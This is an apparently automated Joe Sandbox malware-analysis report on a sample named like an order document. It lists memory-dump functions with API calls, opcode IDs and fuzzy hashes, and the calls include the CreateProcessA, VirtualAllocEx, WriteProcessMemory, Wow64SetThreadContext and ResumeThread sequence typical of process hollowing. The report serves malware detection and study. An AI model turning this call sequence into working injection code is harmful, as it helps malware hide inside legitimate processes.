                                                  • Instruction Fuzzy Hash: CC51A031B04229DFDB14DB998805B7AB7BBFB84721F149C6AE1069B2C1DB749D41C790

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 165cfd0, basic blocks 165cfd0 to 165d1ad; API calls in the graph: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId; internal call to 165d5b9
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D05E
                                                  • GetCurrentThread.KERNEL32 ref: 0165D09B
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D0D8
                                                  • GetCurrentThreadId.KERNEL32 ref: 0165D131
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 44828317f116d0ae95341e002c1deadad2f6282c0a823ab9e19e4fda87ab3a8e
                                                  • Instruction ID: c049476934fc50d8d8b4a287a38bb7dea22a483af7d520c0b61dbd39393728e2
                                                  • Opcode Fuzzy Hash: 44828317f116d0ae95341e002c1deadad2f6282c0a823ab9e19e4fda87ab3a8e
                                                  • Instruction Fuzzy Hash: 0F5155B4900349CFEB69CFA9D948B9EBBF1EF48304F208459D409AB3A1D7359945CB26

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 165cfe0, basic blocks 165cfe0 to 165d1ad; API calls in the graph: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId; internal call to 165d5b9
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D05E
                                                  • GetCurrentThread.KERNEL32 ref: 0165D09B
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D0D8
                                                  • GetCurrentThreadId.KERNEL32 ref: 0165D131
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: dd0f6b9ce63fda87c19db4231439fca75b21083b4aacbb732642a5ee3dc6568d
                                                  • Instruction ID: 4dfb02fe2537462a8ba41757ecd00956769fbd3b72ae89920270d902afdb8279
                                                  • Opcode Fuzzy Hash: dd0f6b9ce63fda87c19db4231439fca75b21083b4aacbb732642a5ee3dc6568d
                                                  • Instruction Fuzzy Hash: 415158B0D00309CFEB68CFAAD948B9EBBF1EF48304F208459D409A7391D7355945CB65

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 5907a98, basic blocks 5907a98 to 5907c8f, no API calls in the graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$$q$$q
                                                  • API String ID: 0-167464460
                                                  • Opcode ID: 6f359ce25bd6fae9fd2f57ddb5c9294f01bec56a532193242c5864fbd5216816
                                                  • Instruction ID: 471a34262699f77a1a99775f14e2adc17fdd90c37a365fe21d1882050b3b045b
                                                  • Opcode Fuzzy Hash: 6f359ce25bd6fae9fd2f57ddb5c9294f01bec56a532193242c5864fbd5216816
                                                  • Instruction Fuzzy Hash: C841C431B04225EFDB14DF99C805B7ABBBAFF44721F149C6AE101AB2C2D7749941CB51

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 590e970, basic blocks 590e970 to 590eb87; internal call to 590e948; the call site at 590eb52 dispatches to 7aa023b, 7aa04a8, 7aa02b8, 7aa025e, 7aa001f, 7aa0583, 7aa0040, 7aa0211, 7aa00d7 and 7aa0834 (the 07AA0000 dump region); no API calls in the graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teq$Teq
                                                  • API String ID: 0-2938103587
                                                  • Opcode ID: e508fc552407b8b0dca15dcea5fc4e19d5c85905bc7e370d8b7a0569ba2dbd70
                                                  • Instruction ID: 3c593573629deef712a2f8c41db93fa3399ed0cb6dc6748a1bc155ada17ba5af
                                                  • Opcode Fuzzy Hash: e508fc552407b8b0dca15dcea5fc4e19d5c85905bc7e370d8b7a0569ba2dbd70
                                                  • Instruction Fuzzy Hash: D161C474E05218CFDF18CFAAC984AEDBBFABF89300F14982AD519AB395D7305945CB50

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 7aa5c6c, basic blocks 7aa5c6c to 7aa5fbd; API calls in the graph: CreateProcessA (block 7aa5e07-7aa5ec1)
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AA5EAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 304ea0a98e3830ac911226bd71d5d50ec0a1e317a0dd91ff9ce0aaa146a07d7b
                                                  • Instruction ID: f88dbb5c57e98b3ed10cdf3d7c917c3b8877d9d02b6dd5d6ff8db5d8813903c1
                                                  • Opcode Fuzzy Hash: 304ea0a98e3830ac911226bd71d5d50ec0a1e317a0dd91ff9ce0aaa146a07d7b
                                                  • Instruction Fuzzy Hash: 88A159B1D0121ADFEB24CF69CC44BEDBBB2BF44310F148169E828A7240DB759995CF95

                                                  Control-flow Graph
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AA5EAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 6f8d1cda4940aa6e755df0271c537b607c441c25303f4e37df0ee41a7b17de46
                                                  • Instruction ID: 52c5be20222452590d465fc12c248c6d948fa6b991ba79518a9a92e5664e72be
                                                  • Opcode Fuzzy Hash: 6f8d1cda4940aa6e755df0271c537b607c441c25303f4e37df0ee41a7b17de46
                                                  • Instruction Fuzzy Hash: D59159B1D0031ADFEB24CF69C844BADBBB2BF48314F148169E828A7240DB759991CF95

                                                  Control-flow Graph
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0165AF9E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 4868ffe263755ef842bee816f9806002b844716b89a636f5569029289ad2a596
                                                  • Instruction ID: 7f2cf9f56627a4a501b42830e80cda0b5ab5fd303a06e259b9a41bc998f2f588
                                                  • Opcode Fuzzy Hash: 4868ffe263755ef842bee816f9806002b844716b89a636f5569029289ad2a596
                                                  • Instruction Fuzzy Hash: 10714870A00B058FE765DF6AD84475ABBF2FF88204F008A2ED94AD7B50D735E849CB91

                                                  Control-flow Graph
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016559C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e636a03b0630d89685c58584c27152a9703db77a34739979bb0bfcf75403e02b
                                                  • Instruction ID: 32478f77fad6d8d844baa26962e6b4bd2e7b593b11ee78f25ae40b8d87f361e5
                                                  • Opcode Fuzzy Hash: e636a03b0630d89685c58584c27152a9703db77a34739979bb0bfcf75403e02b
                                                  • Instruction Fuzzy Hash: A941D074C00719CFEB24CFAAC9847CDBBB1BF49304F20806AD809AB251DB75694ACF91

                                                  Control-flow Graph
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016559C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: bf2cbf2d5d11824937f2ad2fd2422ded7d21201734e3d21b158c47a20dd889cf
                                                  • Instruction ID: f61dc267c3d9ad4de77dce1eaf046b991ea3e4ddc991811bad6d156ec05968da
                                                  • Opcode Fuzzy Hash: bf2cbf2d5d11824937f2ad2fd2422ded7d21201734e3d21b158c47a20dd889cf
                                                  • Instruction Fuzzy Hash: C141A271C00719CFEB25DFAAC88479DBBF5BF49304F20805AD809AB251DB756949CF91

                                                  Control-flow Graph
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AA5A80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 2c37266207f69fbd10315bfae633c782691ca0d2b861b4ebaca7395ccc759382
                                                  • Instruction ID: 2e21af085b44b2df587cf85fcdca010724656d170b6ab24a4656e0a6633c5ea7
                                                  • Opcode Fuzzy Hash: 2c37266207f69fbd10315bfae633c782691ca0d2b861b4ebaca7395ccc759382
                                                  • Instruction Fuzzy Hash: 7D2147B5D003199FDB14CFA9D884BEEBBF5FF48310F10842AE918A7241C7799950CBA5

                                                  Control-flow Graph
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AA5A80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 81ab655aae857939c71f53975bd94f726d4f8d3aac091bdd46b94f9677bd3908
                                                  • Instruction ID: 0d6c9345465575b9cfc1842deef20a7fdcc554e92a21fe2230dfe230693cd573
                                                  • Opcode Fuzzy Hash: 81ab655aae857939c71f53975bd94f726d4f8d3aac091bdd46b94f9677bd3908
                                                  • Instruction Fuzzy Hash: BE2124B1D003199FDB14CFAAC884BEEBBF5FF48310F10842AE918A7240D7799950CBA5
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA58D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 8a89088a5a05db5eef652313f6bf2b1c94c756fc75cf27c171e58202a7898d10
                                                  • Instruction ID: 8bcf455c3b6c60fdfffcac24c044c7df811d339b5416be54369ea6887865b725
                                                  • Opcode Fuzzy Hash: 8a89088a5a05db5eef652313f6bf2b1c94c756fc75cf27c171e58202a7898d10
                                                  • Instruction Fuzzy Hash: 4A2157B5D003099FDB24CFAAC485BEEBBF4EB48310F10842AD518A7241CB789944CFA5
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AA5B60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 966ade5f171aec12df52c3f9505be476ec71588a472614a42e1bfc082f9ae601
                                                  • Instruction ID: 68826e883e3a677d8e4f739d475a741286624eb77a37df05b4df848569019ad1
                                                  • Opcode Fuzzy Hash: 966ade5f171aec12df52c3f9505be476ec71588a472614a42e1bfc082f9ae601
                                                  • Instruction Fuzzy Hash: C62126B5C003599FDB10CFAAD840BEEFBF5FF48210F14842AE558A7640D7399540CBA5
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AA5B60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 5f6353bc542f0014547586fc156513a6d1193b465f5cb68f5826ad5d08ccfc1b
                                                  • Instruction ID: d751de8b475ed85223a4e007816626479a5173f8a712cca0affa3668fdda4581
                                                  • Opcode Fuzzy Hash: 5f6353bc542f0014547586fc156513a6d1193b465f5cb68f5826ad5d08ccfc1b
                                                  • Instruction Fuzzy Hash: CC21F2B1C003599FDB14DFAAC880BEEFBF5FF48210F10842AE918A7240D73999008BA5
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA58D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 7a0db2da5ce542b8f0e82ebfc83e3c1344286170e4e62f4f15e4cefd132c4d9c
                                                  • Instruction ID: 53328c438aa7f8dcc354fdd646f84a84f051fa3e2c11db24032d72030af376b8
                                                  • Opcode Fuzzy Hash: 7a0db2da5ce542b8f0e82ebfc83e3c1344286170e4e62f4f15e4cefd132c4d9c
                                                  • Instruction Fuzzy Hash: 242135B1D003099FDB14DFAAC485BEEBBF4EF88310F14842AD519A7241CB789944CFA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0165D6B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 174ed622b918281e660f95e407c1ab97533a59246b4fd4e41c00e6da1551a05f
                                                  • Instruction ID: 8745d870deb79e33c666da3ed5b45590abaf3923b7f6a25811c8f1bda72bbc2d
                                                  • Opcode Fuzzy Hash: 174ed622b918281e660f95e407c1ab97533a59246b4fd4e41c00e6da1551a05f
                                                  • Instruction Fuzzy Hash: 7921E4B5D00258EFDB10CF9AD884ADEFBF4EB48310F14801AE918A7350D379A940CFA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0165D6B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 7b2e51ee33567a269aa71cea903d04a3b9a8d12ad307360706b60232d808a179
                                                  • Instruction ID: dd4f0ceebcc34f09b30d6fc7a26174bebc8c76f02d46afca964e4e4ca3f0632a
                                                  • Opcode Fuzzy Hash: 7b2e51ee33567a269aa71cea903d04a3b9a8d12ad307360706b60232d808a179
                                                  • Instruction Fuzzy Hash: C92114B5D00259DFDB10CFAAD984ADEBBF4EB48310F14841AE918A3350C338A940CF64
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AA599E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 5f689526c11584e6070c29359c5cbfb8e440a5f62f335ddd8b838654282cad5e
                                                  • Instruction ID: 4b26873ec001dbd567d629314fe38edf2a6e76ee2eed16ca5b427813e24dbb67
                                                  • Opcode Fuzzy Hash: 5f689526c11584e6070c29359c5cbfb8e440a5f62f335ddd8b838654282cad5e
                                                  • Instruction Fuzzy Hash: D2114776800249DFDB24CFAAD844BEEBBF5EB88320F10841AE515A7650CB369540CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: bd7ded8d7291a502cce62723d28e6cf679464c8072d1146157f8d51ded31d80f
                                                  • Instruction ID: e47caac4b3c88d54bee953a8bc273ef77db0647563276acd55d5618bb6c94699
                                                  • Opcode Fuzzy Hash: bd7ded8d7291a502cce62723d28e6cf679464c8072d1146157f8d51ded31d80f
                                                  • Instruction Fuzzy Hash: F4115BB5C00348DFDB24DFAAD4457EEFBF5EB88320F14841AD515A7640CB75A540CBA5
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AA599E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 56149c363c61e6690c48c22586b45707a5e5dad07ce161f6656e65f54fb063b0
                                                  • Instruction ID: c5c99ca1bac3765474b634273351550154e9a92f2d9bca599c986a427edcdb78
                                                  • Opcode Fuzzy Hash: 56149c363c61e6690c48c22586b45707a5e5dad07ce161f6656e65f54fb063b0
                                                  • Instruction Fuzzy Hash: 7E115971C00349DFDB24CFAAC844BEEBBF5EB88320F108419E515A7250C7359500CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: dd38e1ef2d76b0d3eb5665b41fbe400c12726a48963091bf4dcc243a8c14ec1f
                                                  • Instruction ID: 27410d18cf6e47931bca2675a5eea9c690bc4d67f8ddbab29c0bc5789dde4eab
                                                  • Opcode Fuzzy Hash: dd38e1ef2d76b0d3eb5665b41fbe400c12726a48963091bf4dcc243a8c14ec1f
                                                  • Instruction Fuzzy Hash: F3113AB1D00349DFDB24DFAAD4457EEFBF5EB88320F24841AD519A7240CB79A540CB95
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AA891D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89d5daf79bb76548ad9a18ab585afc0ce1d8425a7bdba2aa1ef4751ed0247696
                                                  • Instruction ID: a306bbd38f562616c2f37bb99e177b650d2af5c1acdf1dc30380113d26369ce0
                                                  • Opcode Fuzzy Hash: 89d5daf79bb76548ad9a18ab585afc0ce1d8425a7bdba2aa1ef4751ed0247696
                                                  • Instruction Fuzzy Hash: 68214B31B08214DFDB04DB6CA844B797BB6EFD5361B54087EE606E72C2DB318C158766
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 685315419e02a5e53124068a98f7678cb2bee0d29a14fd0f54c8b702631265bf
                                                  • Instruction ID: 031db4562784d384af66236779ec367e8e596a6a4c8f648ad27ccf0365b99fec
                                                  • Opcode Fuzzy Hash: 685315419e02a5e53124068a98f7678cb2bee0d29a14fd0f54c8b702631265bf
                                                  • Instruction Fuzzy Hash: 70310F70A04A069FD724DF2AC484A6ABBF6FF88700B15CD69D51ADB664DB30F841CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eba172eb4068a9a37fa85f481aba70a1e2996652a405eaea9e7e4b6b5f00cf20
                                                  • Instruction ID: 9746699c61c5d22e19e55916405dc078da3e8dfd390262b4a408638596457953
                                                  • Opcode Fuzzy Hash: eba172eb4068a9a37fa85f481aba70a1e2996652a405eaea9e7e4b6b5f00cf20
                                                  • Instruction Fuzzy Hash: 2221B4717003058FC710EF79D8589ABBBF6EF85204B54886EE5469B350EF71E809CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 658dce4ed104dacb77af627a9e3bfb9963e552f0e25ed07bb5d1e8dcc18f9d07
                                                  • Instruction ID: fde48a5c498de7db16f4adbf4bc7e5fa9aa870777abf0fa5b92dae9a6e3647fb
                                                  • Opcode Fuzzy Hash: 658dce4ed104dacb77af627a9e3bfb9963e552f0e25ed07bb5d1e8dcc18f9d07
                                                  • Instruction Fuzzy Hash: 5B312170A04A029FD724DF2AC545A6ABBF6BF88700B14C96DD419DB760D730F841CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1275825938.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14fd000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1ca32a6868d452d971ae60ca1459a9ad811b9a7af202087e964ce27b62e9617
                                                  • Instruction ID: 550552b3bdc01cb4e598f7fff42d6d9e448c16da2055ed3dfeaca9d5d3723453
                                                  • Opcode Fuzzy Hash: c1ca32a6868d452d971ae60ca1459a9ad811b9a7af202087e964ce27b62e9617
                                                  • Instruction Fuzzy Hash: 3B2103B2900240EFDB15DF54D9C4B27BF65FB88318F20C56EEA090B366C336D456CAA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1275825938.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14fd000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1c22c634d929e5a2b671bafe12ecf875d41e0328c3ceb93b962066069239b7e
                                                  • Instruction ID: 853643bf67536688a554fffbdab4ec303c8f67512dad2881153feb440e0f33bb
                                                  • Opcode Fuzzy Hash: f1c22c634d929e5a2b671bafe12ecf875d41e0328c3ceb93b962066069239b7e
                                                  • Instruction Fuzzy Hash: B3210672900204DFDB15DF54D9C0B56BB65FB84314F20C57EEA090F366C336E456CAA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9b9dc865fbdf264d762e11cb955b79d5775d6f29d3fba7ed44f7c97822b80dc
                                                  • Instruction ID: b94bd7132a5c1ce8dd3bab9aee021712f2b6b9d463a91075341835f5aa3a0162
                                                  • Opcode Fuzzy Hash: e9b9dc865fbdf264d762e11cb955b79d5775d6f29d3fba7ed44f7c97822b80dc
                                                  • Instruction Fuzzy Hash: 1D21D135A10209DFDB059FA5D84899EBFB6FF98300F00892AF502AB264DF35AC44CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52a0df91280c357f3e51276aa311f2c29cf3e2be7256b72abe9b7ad6617f9e70
                                                  • Instruction ID: 28a8dc2713cd8e270fc2526d541e5b1102779011c14fd8c94ccfcaef9614ccd2
                                                  • Opcode Fuzzy Hash: 52a0df91280c357f3e51276aa311f2c29cf3e2be7256b72abe9b7ad6617f9e70
                                                  • Instruction Fuzzy Hash: B2215079E102198FDF05DFB9C8406FEBBFAEF88240F54492AD905E7254EB359D018B61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e039929ac734143d7fa34dec2d1698e02de015591d966366864a474b03b59e1a
                                                  • Instruction ID: 32101d75daff8db1825e98aa4fbe14d2a89af2f321523967c47764a6aea33086
                                                  • Opcode Fuzzy Hash: e039929ac734143d7fa34dec2d1698e02de015591d966366864a474b03b59e1a
